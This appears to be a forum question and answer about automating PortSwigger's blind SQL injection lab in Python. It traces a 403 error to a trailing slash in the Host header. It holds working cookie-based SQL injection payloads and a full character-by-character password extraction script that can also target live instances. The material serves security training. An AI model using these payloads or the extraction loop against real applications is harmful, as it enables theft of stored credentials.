I'm doing the PortSwigger blind SQL injection lab: https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
In Burp Repeater, after intercepting the request, it works fine. Since the solution is a bit tedious, I automated it with Python, but it returns this response:
<html><head><title>Client Error: Forbidden</title></head><body><h1>Client Error: Forbidden</h1></body></html>
I have exactly the same headers and cookie, but I don't know why it works in Burp and not with Python requests; the two are not the same. Python code:

import pprint
import time
import requests
from bs4 import BeautifulSoup
from collections import OrderedDict

url = "https://xxxxxxxxxxxxxxxxx.web-security-academy.net/filter?category=Lifestyle"

# Raw request headers copied from Burp, one "Name: value" per line
headers_string = """Host: xxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: redacted
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
"""

# Turn the raw block into a header dict that requests can send
header_dict = OrderedDict()
for line in headers_string.splitlines():
    header, value = line.split(":", 1)
    header_dict[header] = value.strip()

# payload.txt holds the candidate characters, one per line
with open("payload.txt", 'r') as f:
    payloads = [i.strip('\n') for i in f.readlines()]

# The password is 20 characters: try every candidate at every position
for i in range(1, 21):
    for p in payloads:
        cookie = f"TrackingId=xxxxxxxxxxxxx' AND (SELECT SUBSTRING(password, {i}, 1) FROM users WHERE username ='administrator')='{p}; session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        header_dict["Cookie"] = cookie
        res = requests.get(url, headers=header_dict)
        print(res.request.headers)
        print(res.headers)
        print(len(res.text))
        print(res.text)
        print(f"Trying payload: {p} at position {i}")
        if "Welcome back!" in res.text:
            print(f"Found password character {p} at position {i}")
            time.sleep(102)
        print("========================================================")
This is the output of printing res.request.headers:
{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36', 'Accept-Encoding': 'gzip, deflate, br', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'Connection': 'keep-alive', 'Host': '0a9000d9049e1c2c80cc719600010093.web-security-academy.net/', 'Sec-Ch-Ua': '"Chromium";v="127", "Not)A;Brand";v="99"', 'Sec-Ch-Ua-Mobile': '?0', 'Sec-Ch-Ua-Platform': '"Windows"', 'Accept-Language': 'en-GB', 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Referer': 'https://0a9000d9049e1c2c80cc719600010093.web-security-academy.net/', 'Priority': 'u=0, i', 'Cookie': "TrackingId=8y60pwYvV2VwjwZm' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username ='administrator')='a; session=LOdCvKmB6g9uLyM0RKnaOqRewmSfZrm8"}
payload.txt has a-z and 0-9, one per line.
The solution is to guess the 20-character password via blind SQLi, which is why I wanted to use Python, so I can understand more rather than relying on tools. Burp Suite headers:
GET /filter?category=Gifts HTTP/2
Host: xxxxxxxxxxxxxxxxxxxxx.web-security-academy.net
Cookie: TrackingId=xxxxxxxxxxx' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username ='administrator')='a; session=LOdCvKmB6g9uLyM0RKnaOqRewmSfZrm8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/filter?category=Gifts
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Content-Length: 2
There was a / at the end of Host that caused the error. Silly mistake.
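As an added example (not code from the question or from PortSwigger), here is a cleaned-up version of the same attack that rejects a Host header carrying a trailing slash before any request is sent, and runs the character-by-character extraction loop against an in-memory SQLite stand-in for the lab so it can be exercised offline. The function names, the SQLite simulation, make_http_oracle, and the sample password and TrackingId are all assumptions of this example; the simulation reproduces only the lab's "Welcome back!" behaviour, not its real backend. SUBSTR is used in place of the lab's SUBSTRING so the same payload works on PostgreSQL and on SQLite.

```python
import sqlite3
from typing import Callable, Dict

WELCOME = "Welcome back!"  # the lab's "condition was true" marker
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def host_is_valid(host: str) -> bool:
    """A Host value is host[:port] only; a path or scheme never belongs in it."""
    return bool(host) and "/" not in host


def parse_raw_headers(raw: str) -> Dict[str, str]:
    """Parse a Burp-style header block ("Name: value" per line) into a dict.

    A Host such as 'lab.web-security-academy.net/' is rejected up front; that
    stray slash is what made the question's script get 403 Forbidden.
    """
    headers: Dict[str, str] = {}
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip()] = value.strip()
    if not host_is_valid(headers.get("Host", "")):
        raise ValueError(f"bad Host header: {headers.get('Host')!r}")
    return headers


def build_tracking_cookie(tracking_id: str, position: int, guess: str) -> str:
    """TrackingId value that is true only if the admin password has `guess` at `position`.

    SUBSTR is used instead of the lab's SUBSTRING so the same payload runs on
    PostgreSQL (the lab) and on the SQLite simulation below.
    """
    return (f"{tracking_id}' AND (SELECT SUBSTR(password, {position}, 1) "
            f"FROM users WHERE username = 'administrator') = '{guess}")


def extract_password(oracle: Callable[[str], str], tracking_id: str,
                     length: int = 20, charset: str = CHARSET) -> str:
    """Boolean-based blind extraction: one request per (position, candidate)."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if WELCOME in oracle(build_tracking_cookie(tracking_id, pos, ch)):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return recovered


def make_simulated_lab(admin_password: str, tracking_id: str) -> Callable[[str], str]:
    """Offline stand-in for the lab: an in-memory SQLite DB queried the vulnerable way."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("CREATE TABLE trackingids (trackingid TEXT)")
    db.execute("INSERT INTO users VALUES ('administrator', ?)", (admin_password,))
    db.execute("INSERT INTO trackingids VALUES (?)", (tracking_id,))

    def oracle(cookie_value: str) -> str:
        # Deliberately vulnerable, like the lab: the cookie is concatenated into SQL.
        query = f"SELECT trackingid FROM trackingids WHERE trackingid = '{cookie_value}'"
        body = "<h1>Lifestyle</h1>"
        if db.execute(query).fetchone():
            body += f"<div>{WELCOME}</div>"
        return body

    return oracle


def make_http_oracle(url: str, raw_headers: str, session_cookie: str) -> Callable[[str], str]:
    """Oracle against a real lab instance (needs network and the requests package)."""
    import requests

    headers = parse_raw_headers(raw_headers)
    # Cookie is rebuilt per request; a Content-Length copied from a GET capture is stale.
    headers.pop("Cookie", None)
    headers.pop("Content-Length", None)

    def oracle(cookie_value: str) -> str:
        headers["Cookie"] = f"TrackingId={cookie_value}; session={session_cookie}"
        return requests.get(url, headers=headers, timeout=10).text

    return oracle


if __name__ == "__main__":
    # Constructed values: a real lab issues its own TrackingId and password.
    lab = make_simulated_lab("x7k2m9q4p1z8w3r6t5y0", "demoTrackingId")
    print(extract_password(lab, "demoTrackingId"))
```

To run it against a real instance, pass the Burp header block (without the Cookie line) and your session cookie to make_http_oracle and hand the returned callable to extract_password; parse_raw_headers will refuse to start if the Host line still carries the slash.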